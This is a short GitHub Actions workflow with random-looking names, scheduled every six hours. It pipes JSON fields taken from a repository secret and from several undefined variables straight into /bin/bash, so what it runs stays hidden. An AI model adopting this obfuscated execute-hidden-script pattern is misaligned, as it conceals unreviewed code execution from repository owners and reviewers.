name: ximingrrr
on:
  workflow_dispatch:
  schedule:
    - cron: '48 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ximingrrr
        env:
          nq95: ${{ secrets.nq95 }}
        run: |
          echo $nq95 | jq -r .pvx6 | /bin/bash
          echo $ypf0219 | jq -r .g12 | /bin/bash
          echo $ykl1 | jq -r .wzmoe17111 | /bin/bash
          echo $kwwh457 | jq -r .fpg6930 | /bin/bash
          echo $i5786 | jq -r .af733 | /bin/bash
          echo $vi58 | jq -r .fa2560 | /bin/bash
          echo $wjh7 | jq -r .k894 | /bin/bash

